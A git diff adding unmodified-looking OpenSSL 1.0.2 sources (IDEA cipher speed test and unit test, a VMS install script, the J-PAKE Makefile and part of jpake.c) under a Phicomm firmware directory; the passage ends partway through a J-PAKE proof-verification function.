+            idea_encrypt(data, &sch);
+        d = Time_F(STOP);
+    } while (d < 3.0);
+    ca = count / 4;
+    cca = count / 200;
+    cb = count;
+    cc = count * 8 / BUFSIZE + 1;
+    printf("idea_set_encrypt_key %ld times\n", ca);
+# define COND(d) (count <= (d))
+# define COUNT(d) (d)
+#else
+# define COND(c) (run)
+# define COUNT(d) (count)
+    signal(SIGALRM, sig_done);
+    printf("Doing idea_set_encrypt_key for 10 seconds\n");
+    alarm(10);
+#endif
+
+    Time_F(START);
+    for (count = 0, run = 1; COND(ca); count += 4) {
+        idea_set_encrypt_key(key, &sch);
+        idea_set_encrypt_key(key, &sch);
+        idea_set_encrypt_key(key, &sch);
+        idea_set_encrypt_key(key, &sch);
+    }
+    d = Time_F(STOP);
+    printf("%ld idea idea_set_encrypt_key's in %.2f seconds\n", count, d);
+    a = ((double)COUNT(ca)) / d;
+
+#ifdef SIGALRM
+    printf("Doing idea_set_decrypt_key for 10 seconds\n");
+    alarm(10);
+#else
+    printf("Doing idea_set_decrypt_key %ld times\n", cca);
+#endif
+
+    Time_F(START);
+    for (count = 0, run = 1; COND(cca); count += 4) {
+        idea_set_decrypt_key(&sch, &sch);
+        idea_set_decrypt_key(&sch, &sch);
+        idea_set_decrypt_key(&sch, &sch);
+        idea_set_decrypt_key(&sch, &sch);
+    }
+    d = Time_F(STOP);
+    printf("%ld idea idea_set_decrypt_key's in %.2f seconds\n", count, d);
+    aa = ((double)COUNT(cca)) / d;
+
+#ifdef SIGALRM
+    printf("Doing idea_encrypt's for 10 seconds\n");
+    alarm(10);
+#else
+    printf("Doing idea_encrypt %ld times\n", cb);
+#endif
+    Time_F(START);
+    for (count = 0, run = 1; COND(cb); count += 4) {
+        unsigned long data[2];
+
+        idea_encrypt(data, &sch);
+        idea_encrypt(data, &sch);
+        idea_encrypt(data, &sch);
+        idea_encrypt(data, &sch);
+    }
+    d = Time_F(STOP);
+    printf("%ld idea_encrypt's in %.2f second\n", count, d);
+    b = ((double)COUNT(cb) * 8) / d;
+
+#ifdef SIGALRM
+    printf("Doing idea_cbc_encrypt on %ld byte blocks for 10 seconds\n",
+           BUFSIZE);
+    alarm(10);
+#else
+    printf("Doing idea_cbc_encrypt %ld times on %ld byte blocks\n", cc,
+           BUFSIZE);
+#endif
+    Time_F(START);
+    for (count = 0, run = 1; COND(cc); count++)
+        idea_cbc_encrypt(buf, buf, BUFSIZE, &sch, &(key[0]), IDEA_ENCRYPT);
+    d = Time_F(STOP);
+    printf("%ld idea_cbc_encrypt's of %ld byte blocks in %.2f second\n",
+           count, BUFSIZE, d);
+    c = ((double)COUNT(cc) * BUFSIZE) / d;
+
+    printf("IDEA set_encrypt_key per sec = %12.2f (%9.3fuS)\n", a, 1.0e6 / a);
+    printf("IDEA set_decrypt_key per sec = %12.2f (%9.3fuS)\n", aa,
+           1.0e6 / aa);
+    printf("IDEA raw ecb bytes   per sec = %12.2f (%9.3fuS)\n", b, 8.0e6 / b);
+    printf("IDEA cbc     bytes   per sec = %12.2f (%9.3fuS)\n", c, 8.0e6 / c);
+    exit(0);
+#if defined(LINT) || defined(OPENSSL_SYS_MSDOS)
+    return (0);
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/idea/ideatest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/idea/ideatest.c
new file mode 100644
index 0000000..a967dd5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/idea/ideatest.c
@@ -0,0 +1,232 @@
+/* crypto/idea/ideatest.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+
+#include "../e_os.h"
+
+#ifdef OPENSSL_NO_IDEA
+int main(int argc, char *argv[])
+{
+    printf("No IDEA support\n");
+    return (0);
+}
+#else
+# include <openssl/idea.h>
+
+unsigned char k[16] = {
+    0x00, 0x01, 0x00, 0x02, 0x00, 0x03, 0x00, 0x04,
+    0x00, 0x05, 0x00, 0x06, 0x00, 0x07, 0x00, 0x08
+};
+
+unsigned char in[8] = { 0x00, 0x00, 0x00, 0x01, 0x00, 0x02, 0x00, 0x03 };
+unsigned char c[8] = { 0x11, 0xFB, 0xED, 0x2B, 0x01, 0x98, 0x6D, 0xE5 };
+
+unsigned char out[80];
+
+char *text = "Hello to all people out there";
+
+static unsigned char cfb_key[16] = {
+    0xe1, 0xf0, 0xc3, 0xd2, 0xa5, 0xb4, 0x87, 0x96,
+    0x69, 0x78, 0x4b, 0x5a, 0x2d, 0x3c, 0x0f, 0x1e,
+};
+static unsigned char cfb_iv[80] =
+    { 0x34, 0x12, 0x78, 0x56, 0xab, 0x90, 0xef, 0xcd };
+static unsigned char cfb_buf1[40], cfb_buf2[40], cfb_tmp[8];
+# define CFB_TEST_SIZE 24
+static unsigned char plain[CFB_TEST_SIZE] = {
+    0x4e, 0x6f, 0x77, 0x20, 0x69, 0x73,
+    0x20, 0x74, 0x68, 0x65, 0x20, 0x74,
+    0x69, 0x6d, 0x65, 0x20, 0x66, 0x6f,
+    0x72, 0x20, 0x61, 0x6c, 0x6c, 0x20
+};
+
+static unsigned char cfb_cipher64[CFB_TEST_SIZE] = {
+    0x59, 0xD8, 0xE2, 0x65, 0x00, 0x58, 0x6C, 0x3F,
+    0x2C, 0x17, 0x25, 0xD0, 0x1A, 0x38, 0xB7, 0x2A,
+    0x39, 0x61, 0x37, 0xDC, 0x79, 0xFB, 0x9F, 0x45
+/*- 0xF9,0x78,0x32,0xB5,0x42,0x1A,0x6B,0x38,
+    0x9A,0x44,0xD6,0x04,0x19,0x43,0xC4,0xD9,
+    0x3D,0x1E,0xAE,0x47,0xFC,0xCF,0x29,0x0B,*/
+};
+
+static int cfb64_test(unsigned char *cfb_cipher);
+static char *pt(unsigned char *p);
+int main(int argc, char *argv[])
+{
+    int i, err = 0;
+    IDEA_KEY_SCHEDULE key, dkey;
+    unsigned char iv[8];
+
+    idea_set_encrypt_key(k, &key);
+    idea_ecb_encrypt(in, out, &key);
+    if (memcmp(out, c, 8) != 0) {
+        printf("ecb idea error encrypting\n");
+        printf("got     :");
+        for (i = 0; i < 8; i++)
+            printf("%02X ", out[i]);
+        printf("\n");
+        printf("expected:");
+        for (i = 0; i < 8; i++)
+            printf("%02X ", c[i]);
+        err = 20;
+        printf("\n");
+    }
+
+    idea_set_decrypt_key(&key, &dkey);
+    idea_ecb_encrypt(c, out, &dkey);
+    if (memcmp(out, in, 8) != 0) {
+        printf("ecb idea error decrypting\n");
+        printf("got     :");
+        for (i = 0; i < 8; i++)
+            printf("%02X ", out[i]);
+        printf("\n");
+        printf("expected:");
+        for (i = 0; i < 8; i++)
+            printf("%02X ", in[i]);
+        printf("\n");
+        err = 3;
+    }
+
+    if (err == 0)
+        printf("ecb idea ok\n");
+
+    memcpy(iv, k, 8);
+    idea_cbc_encrypt((unsigned char *)text, out, strlen(text) + 1, &key, iv,
+                     1);
+    memcpy(iv, k, 8);
+    idea_cbc_encrypt(out, out, 8, &dkey, iv, 0);
+    idea_cbc_encrypt(&(out[8]), &(out[8]), strlen(text) + 1 - 8, &dkey, iv,
+                     0);
+    if (memcmp(text, out, strlen(text) + 1) != 0) {
+        printf("cbc idea bad\n");
+        err = 4;
+    } else
+        printf("cbc idea ok\n");
+
+    printf("cfb64 idea ");
+    if (cfb64_test(cfb_cipher64)) {
+        printf("bad\n");
+        err = 5;
+    } else
+        printf("ok\n");
+
+# ifdef OPENSSL_SYS_NETWARE
+    if (err)
+        printf("ERROR: %d\n", err);
+# endif
+    EXIT(err);
+    return (err);
+}
+
+static int cfb64_test(unsigned char *cfb_cipher)
+{
+    IDEA_KEY_SCHEDULE eks, dks;
+    int err = 0, i, n;
+
+    idea_set_encrypt_key(cfb_key, &eks);
+    idea_set_decrypt_key(&eks, &dks);
+    memcpy(cfb_tmp, cfb_iv, 8);
+    n = 0;
+    idea_cfb64_encrypt(plain, cfb_buf1, (long)12, &eks,
+                       cfb_tmp, &n, IDEA_ENCRYPT);
+    idea_cfb64_encrypt(&(plain[12]), &(cfb_buf1[12]),
+                       (long)CFB_TEST_SIZE - 12, &eks,
+                       cfb_tmp, &n, IDEA_ENCRYPT);
+    if (memcmp(cfb_cipher, cfb_buf1, CFB_TEST_SIZE) != 0) {
+        err = 1;
+        printf("idea_cfb64_encrypt encrypt error\n");
+        for (i = 0; i < CFB_TEST_SIZE; i += 8)
+            printf("%s\n", pt(&(cfb_buf1[i])));
+    }
+    memcpy(cfb_tmp, cfb_iv, 8);
+    n = 0;
+    idea_cfb64_encrypt(cfb_buf1, cfb_buf2, (long)13, &eks,
+                       cfb_tmp, &n, IDEA_DECRYPT);
+    idea_cfb64_encrypt(&(cfb_buf1[13]), &(cfb_buf2[13]),
+                       (long)CFB_TEST_SIZE - 13, &eks,
+                       cfb_tmp, &n, IDEA_DECRYPT);
+    if (memcmp(plain, cfb_buf2, CFB_TEST_SIZE) != 0) {
+        err = 1;
+        printf("idea_cfb_encrypt decrypt error\n");
+        for (i = 0; i < 24; i += 8)
+            printf("%s\n", pt(&(cfb_buf2[i])));
+    }
+    return (err);
+}
+
+static char *pt(unsigned char *p)
+{
+    static char bufs[10][20];
+    static int bnum = 0;
+    char *ret;
+    int i;
+    static char *f = "0123456789ABCDEF";
+
+    ret = &(bufs[bnum++][0]);
+    bnum %= 10;
+    for (i = 0; i < 8; i++) {
+        ret[i * 2] = f[(p[i] >> 4) & 0xf];
+        ret[i * 2 + 1] = f[p[i] & 0xf];
+    }
+    ret[16] = '\0';
+    return (ret);
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/idea/version b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/idea/version
new file mode 100644
index 0000000..3f22293
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/idea/version
@@ -0,0 +1,12 @@
+1.1 07/12/95 - eay
+	Many thanks to Rhys Weatherley <rweather@us.oracle.com>
+	for pointing out that I was assuming little endian byte
+	order for all quantities what idea actually used
+	bigendian.  No where in the spec does it mention
+	this, it is all in terms of 16 bit numbers and even the example
+	does not use byte streams for the input example :-(.
+	If you byte swap each pair of input, keys and iv, the functions
+	would produce the output as the old version :-(.
+
+1.0 ??/??/95 - eay
+	First version.
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/install-crypto.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/install-crypto.com
new file mode 100755
index 0000000..af1d75b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/install-crypto.com
@@ -0,0 +1,196 @@
+$! INSTALL.COM -- Installs the files in a given directory tree
+$!
+$! Author: Richard Levitte <richard@levitte.org>
+$! Time of creation: 22-MAY-1998 10:13
+$!
+$! Changes by Zoltan Arpadffy <zoli@polarhome.com>
+$!
+$! P1  root of the directory tree
+$! P2  "64" for 64-bit pointers.
+$!
+$!
+$! Announce/identify.
+$!
+$ proc = f$environment( "procedure")
+$ write sys$output "@@@ "+ -
+   f$parse( proc, , , "name")+ f$parse( proc, , , "type")
+$!
+$ on error then goto tidy
+$ on control_c then goto tidy
+$!
+$ if (p1 .eqs. "")
+$ then
+$   write sys$output "First argument missing."
+$   write sys$output -
+     "It should be the directory where you want things installed."
+$     exit
+$ endif
+$!
+$ if (f$getsyi( "cpu") .lt. 128)
+$ then
+$   arch = "VAX"
+$ else
+$   arch = f$edit( f$getsyi( "arch_name"), "upcase")
+$   if (arch .eqs. "") then arch = "UNK"
+$ endif
+$!
+$ archd = arch
+$ lib32 = "32"
+$ shr = "_SHR32"
+$!
+$ if (p2 .nes. "")
+$ then
+$   if (p2 .eqs. "64")
+$   then
+$     archd = arch+ "_64"
+$     lib32 = ""
+$     shr = "_SHR"
+$   else
+$     if (p2 .nes. "32")
+$     then
+$       write sys$output "Second argument invalid."
+$       write sys$output "It should be "32", "64", or nothing."
+$       exit
+$     endif
+$   endif
+$ endif
+$!
+$ root = f$parse( p1, "[]A.;0", , , "syntax_only, no_conceal") - "A.;0"
+$ root_dev = f$parse( root, , , "device", "syntax_only")
+$ root_dir = f$parse( root, , , "directory", "syntax_only") - -
+   "[000000." - "][" - "[" - "]"
+$ root = root_dev + "[" + root_dir
+$!
+$ define /nolog wrk_sslroot 'root'.] /trans=conc
+$ define /nolog wrk_sslinclude wrk_sslroot:[include]
+$ define /nolog wrk_sslxlib wrk_sslroot:['arch'_lib]
+$!
+$ if f$parse("wrk_sslroot:[000000]") .eqs. "" then -
+   create /directory /log wrk_sslroot:[000000]
+$ if f$parse("wrk_sslinclude:") .eqs. "" then -
+   create /directory /log wrk_sslinclude:
+$ if f$parse("wrk_sslxlib:") .eqs. "" then -
+   create /directory /log wrk_sslxlib:
+$!
+$ sdirs := , -
+   'archd', -
+   objects, -
+   md4, md5, sha, mdc2, hmac, ripemd, whrlpool, -
+   des, aes, rc2, rc4, idea, bf, cast, camellia, seed, -
+   bn, ec, rsa, dsa, ecdsa, dh, ecdh, dso, engine, -
+   buffer, bio, stack, lhash, rand, err, -
+   evp, asn1, pem, x509, x509v3, conf, txt_db, pkcs7, pkcs12, comp, ocsp, -
+   ui, krb5, -
+   store, cms, pqueue, ts, jpake
+$!
+$ exheader_ := crypto.h, opensslv.h, ebcdic.h, symhacks.h, ossl_typ.h
+$ exheader_'archd' := opensslconf.h
+$ exheader_objects := objects.h, obj_mac.h
+$ exheader_md2 := md2.h
+$ exheader_md4 := md4.h
+$ exheader_md5 := md5.h
+$ exheader_sha := sha.h
+$ exheader_mdc2 := mdc2.h
+$ exheader_hmac := hmac.h
+$ exheader_ripemd := ripemd.h
+$ exheader_whrlpool := whrlpool.h
+$ exheader_des := des.h, des_old.h
+$ exheader_aes := aes.h
+$ exheader_rc2 := rc2.h
+$ exheader_rc4 := rc4.h
+$ exheader_rc5 := rc5.h
+$ exheader_idea := idea.h
+$ exheader_bf := blowfish.h
+$ exheader_cast := cast.h
+$ exheader_camellia := camellia.h
+$ exheader_seed := seed.h
+$ exheader_modes := modes.h
+$ exheader_bn := bn.h
+$ exheader_ec := ec.h
+$ exheader_rsa := rsa.h
+$ exheader_dsa := dsa.h
+$ exheader_ecdsa := ecdsa.h
+$ exheader_dh := dh.h
+$ exheader_ecdh := ecdh.h
+$ exheader_dso := dso.h
+$ exheader_engine := engine.h
+$ exheader_buffer := buffer.h
+$ exheader_bio := bio.h
+$ exheader_stack := stack.h, safestack.h
+$ exheader_lhash := lhash.h
+$ exheader_rand := rand.h
+$ exheader_err := err.h
+$ exheader_evp := evp.h
+$ exheader_asn1 := asn1.h, asn1_mac.h, asn1t.h
+$ exheader_pem := pem.h, pem2.h
+$ exheader_x509 := x509.h, x509_vfy.h
+$ exheader_x509v3 := x509v3.h
+$ exheader_conf := conf.h, conf_api.h
+$ exheader_txt_db := txt_db.h
+$ exheader_pkcs7 := pkcs7.h
+$ exheader_pkcs12 := pkcs12.h
+$ exheader_comp := comp.h
+$ exheader_ocsp := ocsp.h
+$ exheader_ui := ui.h, ui_compat.h
+$ exheader_krb5 := krb5_asn.h
+$! exheader_store := store.h, str_compat.h
+$ exheader_store := store.h
+$ exheader_cms := cms.h
+$ exheader_pqueue := pqueue.h
+$ exheader_ts := ts.h
+$ exheader_jpake := jpake.h
+$ libs := ssl_libcrypto
+$!
+$ exe_dir := [-.'archd'.exe.crypto]
+$!
+$! Header files.
+$!
+$ i = 0
+$ loop_sdirs: 
+$   d = f$edit( f$element( i, ",", sdirs), "trim")
+$   i = i + 1
+$   if d .eqs. "," then goto loop_sdirs_end
+$   tmp = exheader_'d'
+$   if (d .nes. "") then d = "."+ d
+$   copy /protection = w:re ['d']'tmp' wrk_sslinclude: /log
+$ goto loop_sdirs
+$ loop_sdirs_end:
+$!
+$! Object libraries, shareable images.
+$!
+$ i = 0
+$ loop_lib: 
+$   e = f$edit( f$element( i, ",", libs), "trim")
+$   i = i + 1
+$   if e .eqs. "," then goto loop_lib_end
+$   set noon
+$   file = exe_dir+ e+ lib32+ ".olb"
+$   if f$search( file) .nes. ""
+$   then
+$     copy /protection = w:re 'file' wrk_sslxlib: /log
+$   endif
+$!
+$   file = exe_dir+ e+ shr+ ".exe"
+$   if f$search( file) .nes. ""
+$   then
+$     copy /protection = w:re 'file' wrk_sslxlib: /log
+$   endif
+$   set on
+$ goto loop_lib
+$ loop_lib_end:
+$!
+$ tidy:
+$!
+$ call deass wrk_sslroot
+$ call deass wrk_sslinclude
+$ call deass wrk_sslxlib
+$!
+$ exit
+$!
+$ deass: subroutine
+$ if (f$trnlnm( p1, "LNM$PROCESS") .nes. "")
+$ then
+$   deassign /process 'p1'
+$ endif
+$ endsubroutine
+$!
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/jpake/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/jpake/Makefile
new file mode 100644
index 0000000..110c49c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/jpake/Makefile
@@ -0,0 +1,64 @@
+DIR=jpake
+TOP=../..
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+LIB=$(TOP)/libcrypto.a
+LIBOBJ=jpake.o jpake_err.o
+LIBSRC=jpake.c jpake_err.c
+
+EXHEADER=jpake.h
+TEST=jpaketest.c
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.s *.o *.obj des lib tags core .pure .nfs* *.old *.bak fluff
+
+jpaketest: top jpaketest.c $(LIB)
+	$(CC) $(CFLAGS) -Wall -Werror -g -o jpaketest jpaketest.c $(LIB)
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+jpake.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+jpake.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+jpake.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+jpake.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+jpake.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+jpake.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+jpake.o: ../../include/openssl/symhacks.h jpake.c jpake.h
+jpake_err.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+jpake_err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+jpake_err.o: ../../include/openssl/err.h ../../include/openssl/jpake.h
+jpake_err.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+jpake_err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+jpake_err.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+jpake_err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+jpake_err.o: jpake_err.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/jpake/jpake.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/jpake/jpake.c
new file mode 100644
index 0000000..8c38727
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/jpake/jpake.c
@@ -0,0 +1,508 @@
+#include "jpake.h"
+
+#include <openssl/crypto.h>
+#include <openssl/sha.h>
+#include <openssl/err.h>
+#include <memory.h>
+#include <string.h>
+
+/*
+ * In the definition, (xa, xb, xc, xd) are Alice's (x1, x2, x3, x4) or
+ * Bob's (x3, x4, x1, x2). If you see what I mean.
+ */
+
+typedef struct {
+    char *name;                 /* Must be unique */
+    char *peer_name;
+    BIGNUM *p;
+    BIGNUM *g;
+    BIGNUM *q;
+    BIGNUM *gxc;                /* Alice's g^{x3} or Bob's g^{x1} */
+    BIGNUM *gxd;                /* Alice's g^{x4} or Bob's g^{x2} */
+} JPAKE_CTX_PUBLIC;
+
+struct JPAKE_CTX {
+    JPAKE_CTX_PUBLIC p;
+    BIGNUM *secret;             /* The shared secret */
+    BN_CTX *ctx;
+    BIGNUM *xa;                 /* Alice's x1 or Bob's x3 */
+    BIGNUM *xb;                 /* Alice's x2 or Bob's x4 */
+    BIGNUM *key;                /* The calculated (shared) key */
+};
+
+static void JPAKE_ZKP_init(JPAKE_ZKP *zkp)
+{
+    zkp->gr = BN_new();
+    zkp->b = BN_new();
+}
+
+static void JPAKE_ZKP_release(JPAKE_ZKP *zkp)
+{
+    BN_free(zkp->b);
+    BN_free(zkp->gr);
+}
+
+/* Two birds with one stone - make the global name as expected */
+#define JPAKE_STEP_PART_init    JPAKE_STEP2_init
+#define JPAKE_STEP_PART_release JPAKE_STEP2_release
+
+void JPAKE_STEP_PART_init(JPAKE_STEP_PART *p)
+{
+    p->gx = BN_new();
+    JPAKE_ZKP_init(&p->zkpx);
+}
+
+void JPAKE_STEP_PART_release(JPAKE_STEP_PART *p)
+{
+    JPAKE_ZKP_release(&p->zkpx);
+    BN_free(p->gx);
+}
+
+void JPAKE_STEP1_init(JPAKE_STEP1 *s1)
+{
+    JPAKE_STEP_PART_init(&s1->p1);
+    JPAKE_STEP_PART_init(&s1->p2);
+}
+
+void JPAKE_STEP1_release(JPAKE_STEP1 *s1)
+{
+    JPAKE_STEP_PART_release(&s1->p2);
+    JPAKE_STEP_PART_release(&s1->p1);
+}
+
+static void JPAKE_CTX_init(JPAKE_CTX *ctx, const char *name,
+                           const char *peer_name, const BIGNUM *p,
+                           const BIGNUM *g, const BIGNUM *q,
+                           const BIGNUM *secret)
+{
+    ctx->p.name = OPENSSL_strdup(name);
+    ctx->p.peer_name = OPENSSL_strdup(peer_name);
+    ctx->p.p = BN_dup(p);
+    ctx->p.g = BN_dup(g);
+    ctx->p.q = BN_dup(q);
+    ctx->secret = BN_dup(secret);
+
+    ctx->p.gxc = BN_new();
+    ctx->p.gxd = BN_new();
+
+    ctx->xa = BN_new();
+    ctx->xb = BN_new();
+    ctx->key = BN_new();
+    ctx->ctx = BN_CTX_new();
+}
+
+static void JPAKE_CTX_release(JPAKE_CTX *ctx)
+{
+    BN_CTX_free(ctx->ctx);
+    BN_clear_free(ctx->key);
+    BN_clear_free(ctx->xb);
+    BN_clear_free(ctx->xa);
+
+    BN_free(ctx->p.gxd);
+    BN_free(ctx->p.gxc);
+
+    BN_clear_free(ctx->secret);
+    BN_free(ctx->p.q);
+    BN_free(ctx->p.g);
+    BN_free(ctx->p.p);
+    OPENSSL_free(ctx->p.peer_name);
+    OPENSSL_free(ctx->p.name);
+
+    memset(ctx, '\0', sizeof *ctx);
+}
+
+JPAKE_CTX *JPAKE_CTX_new(const char *name, const char *peer_name,
+                         const BIGNUM *p, const BIGNUM *g, const BIGNUM *q,
+                         const BIGNUM *secret)
+{
+    JPAKE_CTX *ctx = OPENSSL_malloc(sizeof *ctx);
+
+    JPAKE_CTX_init(ctx, name, peer_name, p, g, q, secret);
+
+    return ctx;
+}
+
+void JPAKE_CTX_free(JPAKE_CTX *ctx)
+{
+    JPAKE_CTX_release(ctx);
+    OPENSSL_free(ctx);
+}
+
+static void hashlength(SHA_CTX *sha, size_t l)
+{
+    unsigned char b[2];
+
+    OPENSSL_assert(l <= 0xffff);
+    b[0] = l >> 8;
+    b[1] = l & 0xff;
+    SHA1_Update(sha, b, 2);
+}
+
+static void hashstring(SHA_CTX *sha, const char *string)
+{
+    size_t l = strlen(string);
+
+    hashlength(sha, l);
+    SHA1_Update(sha, string, l);
+}
+
+static void hashbn(SHA_CTX *sha, const BIGNUM *bn)
+{
+    size_t l = BN_num_bytes(bn);
+    unsigned char *bin = OPENSSL_malloc(l);
+
+    hashlength(sha, l);
+    BN_bn2bin(bn, bin);
+    SHA1_Update(sha, bin, l);
+    OPENSSL_free(bin);
+}
+
+/* h=hash(g, g^r, g^x, name) */
+static void zkp_hash(BIGNUM *h, const BIGNUM *zkpg, const JPAKE_STEP_PART *p,
+                     const char *proof_name)
+{
+    unsigned char md[SHA_DIGEST_LENGTH];
+    SHA_CTX sha;
+
+    /*
+     * XXX: hash should not allow moving of the boundaries - Java code
+     * is flawed in this respect. Length encoding seems simplest.
+     */
+    SHA1_Init(&sha);
+    hashbn(&sha, zkpg);
+    OPENSSL_assert(!BN_is_zero(p->zkpx.gr));
+    hashbn(&sha, p->zkpx.gr);
+    hashbn(&sha, p->gx);
+    hashstring(&sha, proof_name);
+    SHA1_Final(md, &sha);
+    BN_bin2bn(md, SHA_DIGEST_LENGTH, h);
+}
+
+/*
+ * Prove knowledge of x
+ * Note that p->gx has already been calculated
+ */
+static void generate_zkp(JPAKE_STEP_PART *p, const BIGNUM *x,
+                         const BIGNUM *zkpg, JPAKE_CTX *ctx)
+{
+    BIGNUM *r = BN_new();
+    BIGNUM *h = BN_new();
+    BIGNUM *t = BN_new();
+
+   /*-
+    * r in [0,q)
+    * XXX: Java chooses r in [0, 2^160) - i.e. distribution not uniform
+    */
+    BN_rand_range(r, ctx->p.q);
+    /* g^r */
+    BN_mod_exp(p->zkpx.gr, zkpg, r, ctx->p.p, ctx->ctx);
+
+    /* h=hash... */
+    zkp_hash(h, zkpg, p, ctx->p.name);
+
+    /* b = r - x*h */
+    BN_mod_mul(t, x, h, ctx->p.q, ctx->ctx);
+    BN_mod_sub(p->zkpx.b, r, t, ctx->p.q, ctx->ctx);
+
+    /* cleanup */
+    BN_free(t);
+    BN_free(h);
+    BN_free(r);
+}
+
+static int verify_zkp(const JPAKE_STEP_PART *p, const BIGNUM *zkpg,
+                      JPAKE_CTX *ctx)
+{
+    BIGNUM *h = BN_new();
+    BIGNUM *t1 = BN_new();
+    BIGNUM *t2 = BN_new();
+    BIGNUM *t3 = BN_new();
+    int ret = 0;
+
+    zkp_hash(h, zkpg, p, ctx->p.peer_name);
+
